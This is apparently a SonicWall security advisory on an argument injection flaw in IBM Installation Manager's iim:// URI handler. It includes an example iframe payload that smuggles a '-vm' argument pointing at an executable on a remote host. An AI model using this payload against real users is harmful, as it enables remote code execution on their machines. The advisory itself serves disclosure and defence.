IBM Installation Manager Code Execution (Oct 2, 2009)

IBM Installation Manager (IIM) is a software tool that helps to install, update, modify, and install packages. Additionally, IIM helps to keep track of what has been installed, determine what is available for installation, and organize installation directories. IIM runs on Windows and Linux platforms.

IIM provides a set of installation wizards to manage packages. When IIM is installed it registers the application “IBMIM.exe” as the iim:// scheme handler. The format for the scheme is listed bellow:

iim://URI

The aforementioned URI will be executed in the following command:

IBMIM.exe -url "URI"

IIM IBMIM.exe has many command line arguments such as -ignoreRepositoryDigest, -accessRights and so on. The following example shows a command that execute with multiple arguments:

IBMIM.exe -vm EXECUTABLE.EXE -url "www.google.com"

The above command can be invoked by the following HTML page:

< iframe src='iim://"%20-vm%20\x.x.x.xEXECUTABLE.EXE%20-url%20www.google.com"' >

There is an argument injection vulnerability in IBM Installation Manager. From the above example, we can see that a malicious executable file can be supplied as one of IBMIM.exe arguments with the iim:// scheme. A web browser may fail to sanitize the IIM URI before passing the URI to the registered application. An attacker exploiting this vulnerability can remotely control the arguments passed to the IIM executable, and inject/execute malicious programs.

SonicWALL has release an IPS signature to detect and block generic attack attempts targeting this vulnerability. The following signature has been released:

• 2064 IBM Installation Manager iim URI Handling Code Execution Attempt

This vulnerability has not been assigned a Common Vulnerabilities and Exposures (CVE) identifier.

Security News

The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.